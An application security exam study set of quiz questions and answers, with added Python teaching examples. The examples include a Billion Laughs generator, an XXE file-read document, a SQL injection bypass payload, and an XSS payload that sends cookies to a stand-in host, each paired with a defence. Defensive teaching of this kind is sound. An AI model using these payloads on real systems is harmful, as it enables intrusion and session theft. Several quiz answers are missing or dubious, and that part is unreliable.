Application Security Final
Extending Burp functionality is possible through the use of extensions. Which extension type is not supported in Burp?
.NET (Burp extensions are written in Java, or in Python and Ruby via Jython and JRuby)
Which attack commonly associated with phishing can a WAF protect against?
Cross Site Scripting
Select the HIPAA 164 Subpart C technical safeguard that is not a standard.
Encryption (it is an addressable implementation specification, not a standard)
Implementing whitelisting on the server for validation is one of the best ways to prevent XXE attacks.
False (the primary defense is disabling DTD processing and external entity resolution in the XML parser; input whitelisting on its own does not stop XXE)
Broken access control affects authorization (AuthZ)
True
By the year 2020 there will be more devices than people in use worldwide.
True
In XML, a Tag begins with < and ends with >
True
The parameterized query statement SqlCommand() is used to bind variables in which language?
.NET
Order the threat modeling process.
1. Draw your picture 2. List all elements 3. Ask specific questions
AWS Lambda is defined as the following:
A serverless, event-driven, computing platform that runs code in response to events
Identify all the components from which CloudWatch can consume log information:
AWS Lambda, Amazon ECS, Amazon EC2
PCI-DSS prohibits storage of the following data element:
CAV2/CVC2/CVV2/CID
Which Common Weakness Enumeration (CWE) listing provides the basis for broken access control?
CWE-284 Improper Access Control
Which control type do applications rely on to obfuscate or hide information from the end user?
Client-side Controls
Identify the 2nd step in integrated management:
Configuration management
WAF protection mechanisms include the following: (select all that apply)
Cookie Protection, Session Management Protection
The dynamic application trend includes the following components except:
Customer behavior is very predictable
Information in a database should be protected according to content. Which item is key to this process?
Data Classification
Select all the valid threat modeling question categories:
Data Flow, Data Stores, Processes
Which SQL Injection impact is difficult to detect and poses the greatest integrity risk to the business?
Data modification
Which two of the listed backend systems are potentially vulnerable to injection?
Database, Web Server
Where should TLS be used? Select the most correct answer.
Everywhere
The increasing complexity trend includes the following components except:
Generalization in the persistence tier
Identify the proper order for the centralized logging example given in the presentation:
In addition to implementing the principle of least privilege on the database, the following can serve as a checklist to secure the application server.
Implement ASVS controls
List 2 STRIDE attack types that are applicable to a TLS connection between an end user and a web server. Reference examples in the presentation.
Information Disclosure, Tampering
Securing a Host includes the following areas except
Input Validation
What does TLS provide the user? Select three.
Integrity, Confidentiality, Authenticity
Logging without monitoring is:
An ineffective control, due to the lack of processing and classification of what is logged
XML document formats include all of the following except:
JSON
In a reflected XSS attack an attacker sends a link to the user (victim) that contains an XSS payload. Which delivery mechanism is commonly used to deliver the payload?
Phishing Email
Spoofing
What does TLS stand for?
Transport Layer Security
Billion Laughs Attack expands a 1 KB block of XML to roughly 3 GB of memory.
True
This type of query is resilient to SQL Injection
parameterized query
The Billion Laughs Attack is this type of attack:
Denial of Service
Bulletin Boards and Forums are common ways to inject a reflected XSS attack variant
False
Companies that perform monthly penetration tests should be confident their web applications are secure 24/7.
False
Which compliance standard involves the removal of personal data and is quite challenging to implement?
GDPR
The COBIT framework was created by which organization?
ISACA
A typical Cross Site Scripting (XSS) attack includes: (multiple answers)
Session Stealing, Account Takeover
Select the implementation specification associated with HIPAA 164 subpart C Administrative safeguards that is not required.
Password management
Which of the following is not considered a typical development environment problem?
Platform Vulnerabilities
What types of questions should be asked? Choose four.
Process questions, External Entity questions, Data Flow questions, Data Store questions
What are the current parts for the development of threat models? Choose three.
STRIDE, Data Flow Diagrams, Threats
What does SSL stand for?
Secure Sockets Layer
Automated tools contribute to an easy level of exploitability for the cross-site scripting (XSS) vulnerability
True
Insecure Direct Object References can disclose private data
True
Insecure Direct Object References represents a horizontal or lateral access control vulnerability
True
In order to assess current vulnerabilities, the following resources would be used except:
exploit-db.com website
The XML tag that enables DTD inclusion, required to execute a XXE attack is:
!DOCTYPE
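As an added example (not part of the deck), the following Python builds the classic Billion Laughs document from the DTD questions above, works out how large each entity would become without actually expanding it, and applies the gatekeeping checks a practitioner would run before handing untrusted XML to a real parser. The payloads, function names and the 1 MB expansion cap are constructed for illustration.

```python
import re

# Constructed sample payloads for this example (not taken from the deck).
def build_billion_laughs(depth=9, fanout=10):
    """Generate the classic 'lol' chain: lolN is `fanout` references to lolN-1."""
    decls = ['<!ENTITY lol "lol">']
    for i in range(1, depth + 1):
        ref = f"&lol{i - 1};" if i > 1 else "&lol;"
        decls.append(f'<!ENTITY lol{i} "{ref * fanout}">')
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(decls)
            + f'\n]>\n<lolz>&lol{depth};</lolz>\n')

XXE_DOC = """<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>
"""

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
INTERNAL_ENTITY_RE = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+(\w+)\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
ENTITY_REF_RE = re.compile(r"&(\w+);")


def has_doctype(doc):
    """A DTD (DOCTYPE) is the prerequisite for both XXE and entity-expansion attacks."""
    return DOCTYPE_RE.search(doc) is not None


def external_entities(doc):
    """Names of entities that point outside the document (SYSTEM/PUBLIC): the XXE vector."""
    return EXTERNAL_ENTITY_RE.findall(doc)


def expanded_sizes(doc):
    """Bytes each internal entity occupies once fully expanded, computed from the
    entity reference graph rather than by actually expanding anything."""
    defs = dict(INTERNAL_ENTITY_RE.findall(doc))
    sizes = {}

    def size(name, stack=()):
        if name in sizes:
            return sizes[name]
        if name not in defs:            # predefined (&amp; etc.) or undefined: count as one char
            return 1
        if name in stack:
            raise ValueError(f"recursive entity &{name};")
        body = defs[name]
        total = len(ENTITY_REF_RE.sub("", body))        # literal characters
        for ref in ENTITY_REF_RE.findall(body):         # plus every referenced entity
            total += size(ref, stack + (name,))
        sizes[name] = total
        return total

    for name in defs:
        size(name)
    return sizes


def is_safe_to_parse(doc, allow_dtd=False, max_entity_bytes=1_000_000):
    """Gatekeeper: reject DTDs outright (the usual hardening), or, when a DTD must be
    accepted, reject external entities and any entity that would expand past the cap."""
    if not has_doctype(doc):
        return True
    if not allow_dtd:
        return False
    if external_entities(doc):
        return False
    return max(expanded_sizes(doc).values(), default=0) <= max_entity_bytes


if __name__ == "__main__":
    doc = build_billion_laughs()
    print(len(doc), "bytes on the wire")                          # under 1 KB
    print(expanded_sizes(doc)["lol9"], "bytes after expansion")   # 3,000,000,000
    print(external_entities(XXE_DOC))                             # ['xxe']
```

The generated document is under 1 KB and lol9 expands to 3 x 10^9 bytes, which is the "1 KB to roughly 3 GB" figure the deck quotes. Current parsers (libxml2, Expat 2.4 and later) enforce their own amplification limits, but the defense the questions point at is unchanged: do not process DTDs from untrusted sources, and never resolve external entities.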
The User-Agent request header provides the following information to the server Except:
Accepted Encoding type (that is carried in the separate Accept-Encoding header)
Which of the following represents a true statement about the TLS Protocol
Both Symmetric and Asymmetric encryption are used
A WAF is implemented as a software appliance only
False
DTD stands for Data Type Definition
False (it stands for Document Type Definition)
This type XSS attack variant does not persist.
Reflected
Which of the following data flows would represent the highest risk for the contents of the data store?
User <> firewall <> Web Server <> firewall <> database
Which of the OWASP Top 10 categories would the following fit into? Software is unsupported or out of date
Using components with known vulnerabilities
This WAF feature allows a customer to shorten the window of exposure while fully testing the remediation methods.
Virtual Patching
This scanner detects vulnerable JavaScript libraries as a command line tool or browser plug-in?
retire.js
Which of the following HTTP response codes indicates the issue is with the client request.
404 not found
An example of an application protection framework is the following:
AppSensor
A Web Application Firewall operates at which OSI Layer?
Application
Injected SQL queries run under the context of which account?
Application Account (so the database account the application uses should hold only the privileges the application needs)
________ is one of the main factors driving the need for Web Application Firewalls
Developers not incentivized to develop secure code
Which of the following represents the greatest impact to developer security habits and mindset?
Developers rarely receive formal security training in school or on the job
A user with administrative privileges should always use a single account for both user and administrative tasks to reduce the amount of accounts and account management tasks.
False
ASCII is designed to convert international writing systems into browser readable text
False
HTTPS should only be used on web pages that pass username and password information
False
Known vulnerabilities and corresponding fixes can be found at cve.mitre.org
False
More privileges can be revoked through the Dynamic SQL DB Query Method than the Stored Procedure DB Query Method
False
OWASP is a commercial company focused on application security
False
Per OWASP, the attack vector exploitability rating for Insecure Deserialization is AVERAGE
False (OWASP rates its exploitability as Difficult)
SQL Injection is the only form of injection attack available to a hacker
False
Software security assurance is not practical in an agile development model
False
Symmetric Cryptography uses a public and private key to encrypt data.
False
The AWS WAF cannot be deployed with AWS CloudFront
False
The HttpOnly attribute on the Set-Cookie header tells the browser to allow client-side JavaScript to read and send the cookie
False (HttpOnly does the opposite: the browser still attaches the cookie to requests but hides it from document.cookie)
User IDs are case sensitive according to authentication guidelines.
False
When patching a development stack like LAMP it is not important to consider the interdependencies between the operating system, database, web server, and application platform.
False
Which of the following web application components represents optional functionality in a typical end-to-end solution?
Firewall
Industry standards based on Extensible Markup Language or XML include:
HL7
Which two previous OWASP vulnerabilities were merged to create current OWASP top ten vulnerability of Broken Access Control?
Insecure Direct Object References Missing Function Level Access Control
Which of the following challenges represents the greatest security threat to the Internet?
Internet of Things
What does HTTP Strict Transport Security provide to the user?
It forces the browser to only make HTTPS connections to the server.
Why is an accurate data flow diagram important for threat modeling?
It shows the input and output to everything that can be attacked.
Select the 2 options available within AWS to provide logging and monitoring.
Lambda, CloudWatch
Which of the following is not a Cross Site Scripting Attack Payload type?
Log deletion
The following are all examples of Insufficient Logging and Monitoring.
Logs are only stored locally; auditable events, such as failed logins, are not logged; vulnerability scanning tools do not trigger alerts
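Added example, not from the deck, of what "monitoring" adds on top of "logging": two small detectors run over constructed log lines, one for a burst of failed logins from a single source and one for requests whose User-Agent announces a vulnerability scanner. The log format, the documentation-range IP addresses, the thresholds and the scanner signature list are all assumptions made for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (invented format, documentation-range IPs); not real traffic.
LOG = """\
2024-03-01T10:00:01Z auth ip=203.0.113.5 user=alice result=FAIL
2024-03-01T10:00:05Z auth ip=203.0.113.5 user=alice result=FAIL
2024-03-01T10:00:09Z access ip=198.51.100.7 status=200 ua="Mozilla/5.0"
2024-03-01T10:00:12Z auth ip=203.0.113.5 user=alice result=FAIL
2024-03-01T10:00:20Z auth ip=203.0.113.5 user=admin result=FAIL
2024-03-01T10:00:25Z access ip=203.0.113.9 status=404 ua="sqlmap/1.7#stable"
2024-03-01T10:00:31Z auth ip=203.0.113.5 user=root result=FAIL
2024-03-01T10:01:00Z auth ip=198.51.100.7 user=bob result=FAIL
2024-03-01T10:01:10Z auth ip=198.51.100.7 user=bob result=OK
"""

AUTH_RE = re.compile(r"^(\S+) auth ip=(\S+) user=(\S+) result=(FAIL|OK)$")
ACCESS_RE = re.compile(r'^(\S+) access ip=(\S+) status=(\d{3}) ua="([^"]*)"$')
SCANNER_UAS = ("sqlmap", "nikto", "nessus", "nmap")   # assumed signature list


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def failed_login_bursts(lines, threshold=5, window_s=60):
    """Per-source sliding window: alert the moment `threshold` failures fall within `window_s`."""
    recent = defaultdict(deque)
    alerts = []
    for line in lines:
        m = AUTH_RE.match(line)
        if not m or m.group(4) != "FAIL":
            continue
        ts, ip = m.group(1), m.group(2)
        t = parse_ts(ts)
        q = recent[ip]
        q.append(t)
        while t - q[0] > timedelta(seconds=window_s):   # drop events that fell out of the window
            q.popleft()
        if len(q) == threshold:                         # fire once, when the line is crossed
            alerts.append((ip, ts, f"{threshold} failed logins within {window_s}s"))
    return alerts


def scanner_hits(lines):
    """Flag requests whose User-Agent matches a known vulnerability scanner."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if m and any(s in m.group(4).lower() for s in SCANNER_UAS):
            hits.append((m.group(2), m.group(1), m.group(4)))
    return hits


if __name__ == "__main__":
    lines = LOG.splitlines()
    for alert in failed_login_bursts(lines) + scanner_hits(lines):
        print("ALERT", alert)
```

Neither detector works if the events were never written (the deck's "failed logins are not logged"), and neither fires if the logs stay on the host where nobody reads them; the point of central collection is that this kind of logic can run over everything in one place.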
The current compliance standard governing publicly traded companies is the following:
None of the above
Open source XSS attack tools include which of the following?
Pineapple
Which SSL attack signaled the death of SSL 3.0?
POODLE
AWS WAF Managed Rules are...
Preconfigured rule sets including OWASP Top 10 available for an additional cost
Which of the following is NOT an authentication guideline for email addresses?
Requires SMTP/TLS connection
PCI-DSS includes the following goals except which of the following?
Restrict physical access to cardholder data
DTD is the oldest XML schema going back to which standard?
SGML
Which intercepting proxy functionality is not available within the Burp Community edition? (Functionality is grouped by tab in the Burp user interface)
Scanner
A comprehensive data classification taxonomy represents a core requirement in defending against this vulnerability.
Sensitive Data Exposure
Which of the following components is most secure based on proximity to the "trusted" core?
Servers
Which functionality within Burp produces a site map after it is run?
Spider
According to the PCI-DSS survey in the reading material, which of the following activities put cardholder data at the highest risk?
Storage of payment card numbers
Which of the following headers is required to implement HTTP Strict Transport Security?
Strict-Transport-Security
Which attack types make up STRIDE?
Spoofing, Tampering, Repudiation, Information disclosure, Denial of Service, Elevation of Privilege
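Added example, not from the deck, tying together the threat modeling cards above (draw the picture, list all elements, ask specific questions per element type, STRIDE): a small STRIDE-per-element enumerator over a data flow diagram. The model is the deck's user <> firewall <> web server <> firewall <> database path, with the firewalls represented as trust-zone changes; the element names, zone labels and protocols are assumptions made for the example.

```python
from dataclasses import dataclass

# STRIDE-per-element: which threat classes apply to each DFD element type.
STRIDE_PER_ELEMENT = {
    "external entity": "SR",
    "process": "STRIDE",
    "data store": "TRID",
    "data flow": "TID",
}
STRIDE_NAMES = {
    "S": "Spoofing", "T": "Tampering", "R": "Repudiation",
    "I": "Information disclosure", "D": "Denial of service",
    "E": "Elevation of privilege",
}


@dataclass(frozen=True)
class Element:
    name: str
    kind: str    # key of STRIDE_PER_ELEMENT
    zone: str    # trust zone; a flow between different zones crosses a trust boundary


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    protocol: str


# Constructed model of the deck's path: user <> firewall <> web server <> firewall <> database.
ELEMENTS = [
    Element("User", "external entity", "internet"),
    Element("Web Server", "process", "dmz"),
    Element("Database", "data store", "internal"),
]
FLOWS = [
    Flow("User", "Web Server", "HTTPS"),
    Flow("Web Server", "Database", "SQL"),
]


def enumerate_threats(elements, flows):
    """List every element, then ask the STRIDE questions that apply to its type.
    Returns (target, threat, boundary) rows; boundary names the trust boundary a
    data flow crosses, or is None."""
    zone = {e.name: e.zone for e in elements}
    rows = []
    for e in elements:
        for letter in STRIDE_PER_ELEMENT[e.kind]:
            rows.append((e.name, STRIDE_NAMES[letter], None))
    for f in flows:
        crossing = f"{zone[f.src]} -> {zone[f.dst]}" if zone[f.src] != zone[f.dst] else None
        target = f"{f.src} -> {f.dst} ({f.protocol})"
        for letter in STRIDE_PER_ELEMENT["data flow"]:
            rows.append((target, STRIDE_NAMES[letter], crossing))
    return rows


def boundary_crossing(rows):
    """The flows to examine first: anything that crosses a trust boundary."""
    return [r for r in rows if r[2] is not None]


if __name__ == "__main__":
    for target, threat, boundary in enumerate_threats(ELEMENTS, FLOWS):
        print(f"{target:32} {threat:24} {boundary or ''}")
```

The User -> Web Server (HTTPS) flow comes out with Tampering, Information disclosure and Denial of service, which is why the TLS card above answers Information Disclosure and Tampering: TLS addresses the first two, not the third.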
API security can provide access to monitoring and transformation applications through JSON, REST, and SOAP.
True
Center for Internet Security provides over 500 security benchmarks for popular operating systems.
True
Components typically run with the same privileges as the application itself
True
DOM XSS attacks are triggered when a victim interacts with a web page without causing the page to reload.
True
HTTPS provides verification of server identity via a X.509 certificate
True
Keystroke loggers can take the form of software or a hardware device
True
Known vulnerabilities and corresponding fixes can be found at nvd.nist.gov
True
One option for certificate pinning is to carry a copy of the server's public key.
True
Parameterized Queries perform data type checking on parameter values and limits scope of user input
True
Setting the X-Frame-options header is a defensive setting to prevent Cross Site Scripting
True (as marked in the deck; strictly, X-Frame-Options stops the page from being framed, which is a clickjacking defense, and Content-Security-Policy is the header aimed at script injection)
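Added example, not from the deck, covering the response-header cards above (HttpOnly on Set-Cookie, Strict-Transport-Security for HSTS, X-Frame-Options): a small audit function that reports what is missing from a response, run against a constructed weak response and a hardened one. The header values, cookie names and the one-year HSTS floor are assumptions made for the example.

```python
# Constructed responses for the example; header values are assumptions, not from the deck.
WEAK_HEADERS = {"Content-Type": "text/html"}
WEAK_COOKIES = ["SESSIONID=abc123; Path=/"]

HARDENED_HEADERS = {
    "Content-Type": "text/html",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Frame-Options": "DENY",
}
HARDENED_COOKIES = ["SESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"]

HSTS_MIN_AGE = 31536000   # one year; assumed policy floor


def parse_set_cookie(value):
    """Split one Set-Cookie value into (name, {attribute_lowercase: value_or_None})."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() or None
    return name, attrs


def hsts_max_age(value):
    """Extract max-age from a Strict-Transport-Security value; 0 if absent or malformed."""
    for directive in value.split(";"):
        key, _, val = directive.strip().partition("=")
        if key.lower() == "max-age" and val.strip().isdigit():
            return int(val)
    return 0


def audit_response(headers, set_cookies):
    """Return a list of findings for a response's headers (dict) and Set-Cookie values (list)."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append("missing Strict-Transport-Security (browser may still try plain HTTP)")
    elif hsts_max_age(hsts) < HSTS_MIN_AGE:
        findings.append(f"HSTS max-age below {HSTS_MIN_AGE}s")
    if h.get("x-frame-options", "").upper() not in ("DENY", "SAMEORIGIN"):
        findings.append("X-Frame-Options missing or permissive (page can be framed: clickjacking)")
    for raw in set_cookies:
        name, attrs = parse_set_cookie(raw)
        if "httponly" not in attrs:
            findings.append(f"cookie {name} lacks HttpOnly (readable via document.cookie after XSS)")
        if "secure" not in attrs:
            findings.append(f"cookie {name} lacks Secure (would be sent over plain HTTP)")
    return findings


if __name__ == "__main__":
    for finding in audit_response(WEAK_HEADERS, WEAK_COOKIES):
        print("WEAK:", finding)
    print("HARDENED:", audit_response(HARDENED_HEADERS, HARDENED_COOKIES) or "no findings")
```

Two caveats a reviewer would add: browsers only honor Strict-Transport-Security when it arrives over HTTPS, so it must be set on the TLS site, not the plain-HTTP redirect; and none of these headers removes an injection bug, they only limit what an attacker can do with one.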
Shodan is a tool for scanning Internet of Things (IoT) devices worldwide.
True
String building allows untrusted data to be inserted into a database query
True
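Added example, not from the deck, for the parameterized-query and string-building cards above: the same login lookup written both ways against a constructed in-memory SQLite table, with the classic authentication-bypass payload run through each. The table contents, the payload and the plaintext passwords (kept only to make the rows readable) are assumptions made for the example.

```python
import sqlite3

# Constructed in-memory table for the example (not data from the deck).
# Passwords are stored in plaintext only to keep the demo readable; real systems store salted hashes.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user"), ("carol", "pa55", "user")],
    )
    return conn


def login_string_built(conn, username, password):
    """VULNERABLE: string building. Untrusted input becomes part of the SQL text, so the
    database parses attacker-controlled characters as query syntax."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    """SAFE: parameterized query. The statement is compiled with placeholders and the
    values are bound afterwards, so they can only ever be compared as data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# Classic bypass payload: closes the string literal, makes the WHERE clause always true,
# and comments out the password check that follows.
PAYLOAD = "' OR 1=1 --"

if __name__ == "__main__":
    conn = make_db()
    print("legit, parameterized:", login_parameterized(conn, "alice", "s3cret"))
    print("payload, string built:", login_string_built(conn, PAYLOAD, "x"))    # every row
    print("payload, parameterized:", login_parameterized(conn, PAYLOAD, "x"))  # []
```

The string-built version returns all three users for the payload; the parameterized version returns nothing, because the quote and the comment marker never reach the SQL parser. Whatever an injected query does, it does with the rights of the application's database account, which is the reason the deck pairs parameterization with least privilege on that account.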
Two behaviors that can introduce access control weakness are Specification and Enforcement
True
Using an intercepting proxy to index a web application produces a site map.
True
Utilizing an intercepting proxy like Burp provides visibility to detailed web application traffic and information not visible to the end user in the browser.
True
Web Application Firewalls use signatures to identify threats similar to malware and virus detection software.
True
When remediating source code is not an immediate option a virtual patch can be deployed to protect an application.
True
XSS Attack Payload Types include Session hijacking
True
What is the best way to discover sample or default functionality of a web server?
Use Burp Intruder and a fuzzing list such as FuzzDB.
The COBIT framework was created by which organization?
ISACA (the WorldCom and Enron scandals listed here as the answer are what prompted the Sarbanes-Oxley Act, not the creation of COBIT)
This component is required to use an intercepting proxy successfully when interacting with secure (HTTPS) web sites.
X.509 Certificate (the proxy's own CA certificate, installed in the browser's trust store so the intercepted TLS connections are accepted)
Select a technique that is used for discovering hidden web content in addition to using spider functionality.
Burp
URLs can contain parameters that are visible in the address bar such as: http://mysite.com/listing/?type=2&location=OH Name a tool that can be used to manipulate these parameters before they are sent back to the web site.
Burp
When assessing a newly released vulnerability it is most important to...
determine if the vulnerability applies to components in your environment (i.e. Apache, MySQL, etc.)
These two activities are essential to assessing current applications for vulnerabilities (SELECT TWO)
Scan for vulnerabilities regularly; subscribe to security bulletins
Which HTML tag is often used to inject an XSS attack? < .... >
script
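Added example, not from the deck, for the reflected XSS cards (the phishing-delivered link, the non-persistent variant, the script tag, session stealing): a search page that reflects its query parameter, once as written with the bug and once with HTML output encoding, fed the same attacker link. The hostnames, page template and payload are invented for the example.

```python
import html
from urllib.parse import quote, urlsplit, parse_qs

# Constructed search page and attacker payload for the example (hostnames are invented).
PAGE = "<html><body><h1>Results for: {query}</h1></body></html>"
PAYLOAD = '<script>new Image().src="https://evil.example/c?"+document.cookie</script>'


def phishing_link():
    """The link an attacker would mail to the victim: the payload rides in the URL,
    nothing is stored on the server, hence 'reflected' and 'non-persistent'."""
    return "https://shop.example/search?q=" + quote(PAYLOAD)


def query_param(url):
    """Pull the q= value out of the request URL, percent-decoded."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vulnerable(url):
    """Reflects the parameter straight into the HTML body: reflected XSS."""
    return PAGE.format(query=query_param(url))


def render_fixed(url):
    """Same page with HTML-body output encoding applied to the untrusted value."""
    return PAGE.format(query=html.escape(query_param(url), quote=True))


def contains_script_tag(markup):
    """Crude indicator used only to show the difference between the two renders;
    it is not a sanitizer and should not be used as one."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    link = phishing_link()
    print(link)
    print(render_vulnerable(link))   # the browser would run the payload and leak document.cookie
    print(render_fixed(link))        # the payload is shown as text
```

The encoding has to match the output context: html.escape is right for text in the HTML body, but a value placed inside a script block, an attribute, or a URL needs that context's encoding instead. Marking the session cookie HttpOnly would keep document.cookie empty for this particular payload, which is why the two controls are normally used together.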